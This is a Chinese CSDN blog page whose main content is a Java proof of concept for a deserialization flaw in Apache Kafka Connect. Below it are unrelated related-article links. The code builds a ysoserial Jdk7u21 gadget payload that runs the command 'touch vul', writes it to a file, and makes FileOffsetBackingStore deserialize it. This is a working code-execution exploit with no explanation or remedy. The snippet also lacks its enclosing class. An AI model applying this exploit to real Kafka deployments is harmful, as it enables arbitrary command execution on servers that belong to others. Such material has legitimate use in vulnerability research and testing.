Apache Kafka desrialization vulnerability via runtime

最新推荐文章于 2023-02-09 00:37:07 发布
最新推荐文章于 2023-02-09 00:37:07 发布
阅读量1.2k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cnbird2008/article/details/75669546
版权 
import junit.framework.Test;
import junit.framework.TestCase;
import junit.framework.TestSuite;
import org.apache.commons.io.FileUtils;
import org.apache.kafka.connect.runtime.standalone.StandaloneConfig;
import org.apache.kafka.connect.storage.FileOffsetBackingStore;
import ysoserial.payloads.Jdk7u21;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;

public void test_Kafka_Deser() throws Exception {

        StandaloneConfig config;

        String projectDir = System.getProperty("user.dir");

        Jdk7u21 jdk7u21 = new Jdk7u21();
        Object o = jdk7u21.getObject("touch vul");

        byte[] ser = serialize(o);

        File tempFile = new File(projectDir + "/payload.ser");
        FileUtils.writeByteArrayToFile(tempFile, ser);

        Map<String, String> props = new HashMap<String, String>();
        props.put(StandaloneConfig.OFFSET_STORAGE_FILE_FILENAME_CONFIG,
tempFile.getAbsolutePath());
        props.put(StandaloneConfig.KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_KEY_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        props.put(StandaloneConfig.INTERNAL_VALUE_CONVERTER_CLASS_CONFIG,
"org.apache.kafka.connect.json.JsonConverter");
        config = new StandaloneConfig(props);

        FileOffsetBackingStore restore = new FileOffsetBackingStore();
        restore.configure(config);
        restore.start();
    }

    private byte[] serialize(Object object) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(bout);
        out.writeObject(object);
        out.flush();
        return bout.toByteArray();
    }

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Debezium报错处理系列之四十一:Debezium实际应用报错Unable to configure and start connect.storage.FileOffsetBackingStor
zhengzaifeidelushang的博客
02-11 498
Debezium报错处理系列之四十一:Unable to configure and start the 'org.apache.kafka.connect.storage.FileOffsetBac
修复 Apache Kafka 中的远程代码执行漏洞CVE-2023-25194
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-30 1006
Kafka Connect 中发现可能的 RCE 和拒绝服务问题。更新 阿帕奇软件基金会 (ASF) 已解决了一个漏洞,该漏洞可被利用来使用 Kafka Connect 发起远程代码执行 (RCE) 攻击。该关键漏洞于 2 月 8 日公布,被追踪为 CVE-2023-25194。Apache Kafka Connect 是 Apache Kafka 的一个免费开源组件,是系统、数据库和键值存储之间数据集成的中心枢纽。
开源云原生平台 Apache Kafka暴露多家大企业的敏感数据
smellycat000的专栏
12-07 315
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士由于 Kafdrop 实例配置不当,全球某些规模最大的企业在云上的敏感信息遭暴露。Kafdrop 是 Apache Kafka 的管理接...
mongodb未授权访问漏洞
weixin_34217711的博客
01-05 953
catalogue 1. mongodb安装 2. 未授权访问漏洞 3. 漏洞修复及加固 4. 自动化检测点   1. mongodb安装 apt-get install mongodb 0x1: 创建数据库目录 MongoDB的数据存储在data目录的db目录下,但是这个目录在安装过程不会自动创建,所以你需要手动创建data目录,并在data目录中创建db目录。/dat...
KafkaConnect Offset存储设计
TheOne的博客
02-09 587
KafkaConnect Offset存储设计
apache kafka查询手册
02-04
Apache Kafka是一种分布式流处理平台,由LinkedIn开发并在2011年开源,后来成为Apache软件基金会的顶级项目。Kafka最初设计目标是构建一个实时的数据管道和流处理系统,但随着时间的发展,它已经成为大数据领域中不...
Apache Kafka实战.pdf
02-21
Apache Kafka实战》这本书深入浅出地介绍了Apache Kafka这一分布式流处理平台的各个方面,旨在帮助读者掌握Kafka的实际应用和核心概念。Kafka是一个高吞吐量、低延迟的消息发布订阅系统,常用于构建实时数据管道和...
Apache Kafka 基本介绍.zip
最新发布
03-26
**Apache Kafka 基本介绍** Apache Kafka 是一个开源的分布式流处理平台,由LinkedIn公司开发并贡献给Apache软件基金会。Kafka最初设计为高吞吐量、低延迟的消息发布订阅系统,现在已经发展成为了一个全面的数据流...
apache kafka
11-27
Kafka是一个对于像Hadoop的一样的日志数据和离线分析系统,但又要求实时处理的限制,这是一个可行的解决方案。 1.Kafka集群包含一个或多个服务器,这种服务器被称为broker 2.Partition是物理上的概念,每个Topic...
Junit测试中找不到junit.framework.testcase
热门推荐
记录成长的每一步
08-04 1万+
在使用Junit进行测试时,出现如下问题:找不到junit.framework.testcase 解决方法:选中项目->属性->Java构建路径->库->添加外部jar在eclipse的安装目录中找到eclipse/plugins/org.junit_3.8.1/junit.jar添加上就可以了。  
为什么在Myeclipse中使用Junit之后, 以下这句话总是有错误(import junit.framework.TestCase;)
mercury0916的博客
08-31 1451
出现:“错误(import junit.framework.TestCase;)” 原因是没有导入 junit 类库! 解决方案: 在你的项目上点击右键---&gt;Properties---&gt;Java Build Path---&gt;(Libraries标签)add Library--&gt;JUnit--&gt;Next--&gt;Finish ...
Junit单元测试
APPLE的专栏
02-26 664
最近在写一模块的代码,不能再像原来一样不认真考虑测试了,因为看看Junit如何写单元测试,这里作一些笔记。 1. 下载junit的包,并在工程中引用。不过还可以在eclipse工程中选择Junit的库。 2. 关于使用Junit的目的。主要有四种: 测试某个类的所有方法测试某个类的个别方法测试几个类中的全部方法测试几个类中的指定方法     摘自某参考资料。对此,我觉得我是想测试某个类
Debezium实战-第6章 API与SPI
Kettle实战
04-29 2967
6 API与SPI 6.1 Debezium引擎 Debezium 连接器通常通过将它们部署到 Kafka Connect 服务并配置一个或多个连接器来监控上游数据库并为它们在上游数据库中看到的所有更改生成数据更改事件来操作。这些数据更改事件被写入 Kafka,在那里它们可以被许多不同的应用程序独立使用。Kafka Connect 提供出色的容错性和可扩展性,因为它作为分布式服务运行,并确保所有已注册和配置的连接器始终运行。例如,即使集群中的一个 Kafka Connect 端点出现故障,其余的 Kafka
Debezium引擎
cnhome的专栏
06-20 2523
Debezium引擎 通常,通过将Debezium连接器部署到Kafka Connect服务并配置一个或多个连接器来监视上游数据库并为它们在上游数据库中看到的所有更改生成数据更改事件来进行操作。这些数据更改事件被写入Kafka,在那里它们可以被许多不同的应用程序独立使用。Kafka Connect具有出色的容错性和可扩展性,因为它作为分布式服务运行,并确保所有已注册和配置的连接器始终处于运行状态。例如,即使集群中的一个Kafka Connect端点发生故障,其余的Kafka Connect端点也将重新启动以
java kryo_kryo序列化 - Java序列化期间的错误
weixin_39972567的博客
02-16 1196
我的应用程序有大量域对象,它们通过spring-session被序列化到Redis存储中。我试图使用Kryo(4.0.0)进行自动序列化,而不使对象明确可序列化。kryo序列化 - Java序列化期间的错误我在尝试序列化尚未实现的对象Serializable时收到以下错误。com.esotericsoftware.kryo.KryoException: Error during Java seri...
java Serialization 相关问题
Amarone'blog
09-09 606
注:如果您发现任何不正确的内容,或者您想要分享有关本文主题的更多信息,请撰写评论或联系我 15340938921@163.com。 以下整理文章参考《java编程思想第四版》《EffectiveJava》oracle java官网 以及部分博客 以下环境基于 windows 10 java version “1.8.0_171” 文中代码可能不太严谨,直供研究测试使用! http://zjl...
深入学习Apache Kafka第二版
"Learning Apache Kafka Second Edition 是一本关于Apache Kafka的深入学习指南,旨在帮助读者理解和掌握这个分布式流处理平台的使用。本书适用于对Kafka感兴趣的开发者、数据工程师或者系统架构师,无论你是初学者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值